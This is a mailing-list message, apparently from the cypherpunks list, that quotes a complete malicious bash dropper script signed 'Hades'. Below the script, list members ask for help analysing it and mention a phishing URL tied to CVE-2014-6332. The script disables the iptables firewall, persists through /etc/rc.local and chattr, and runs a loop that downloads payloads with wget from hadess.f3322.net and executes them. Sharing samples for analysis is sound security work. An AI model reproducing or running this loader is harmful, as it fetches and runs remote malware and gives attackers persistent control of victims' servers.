You got it -
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# by:Hades
# 2016-03-10
service iptables stop > /dev/null 2>&1 &
host_dir=`pwd`
if [ "sh $host_dir/journal &" = "$(cat /etc/rc.local | grep
$host_dir/journal | grep -v grep)" ]; then
echo ""
else
echo "sh $host_dir/journal &" >> /etc/rc.local
fi
chattr +i $host_dir/journal
while [ 1 ]; do
Centos_sshd_killn=$(ps aux | grep "$host_dir/hades" | grep -v grep | wc
-l)
if [[ $Centos_sshd_killn -eq 0 ]]; then
if [ ! -f "$host_dir/hades" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
./wget http://hadess.f3322.net:9020/hades -c -O ./hades &>
/dev/null
chmod 755 ./hades
rm wget -rf
else
echo "No wget"
fi
fi
./hades &
elif [[ $Centos_sshd_killn -gt 1 ]]; then
for killed in $(ps aux | grep "$host_dir/hades" | grep -v grep | awk
'{print $2}'); do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[ $Centos_sshd_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
Centos_ssh_killn=$(ps aux | grep "$host_dir/journal" | grep -v grep | wc
-l)
if [[ $Centos_ssh_killn -eq 0 ]]; then
if [ ! -f "$host_dir/journal" ]; then
if [ -f "/usr/bin/wget" ]; then
cp /usr/bin/wget .
chmod +x wget
./wget http://hadess.f3322.net:9020/journal -c -O
$host_dir/journal &> /dev/null
chmod 755 $host_dir/journal
rm wget -rf
else
echo "No wget"
fi
fi
$host_dir/journal &
elif [[ $Centos_ssh_killn -gt 1 ]]; then
for killed in $(ps aux | grep "$host_dir/journal" | grep -v grep |
awk '{print $2}'); do
Centos_ssh_killn=$(($Centos_ssh_killn-1))
if [[ $Centos_ssh_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fi
sleep 600
done
-----Original Message-----
From: John Young [mailto:jya@pipeline.com]
Sent: Tuesday, May 10, 2016 7:58 AM
To: cypherpunks@cpunks.org; Greg Moss
Most interested in the Journal file. Could someone have a look? On May 10, 2016 3:53 AM, "John Young" <mailto:jya@pipeline.comjya@pipeline.com> wrote: At 02:13 AM 5/10/2016, Greg Moss imposter phished: http://219.234.6.206:8080/http://219.234.6.206:8080/
Which produces:
Web attack: Microsoft OleAut32 RCE CVE-2014-6332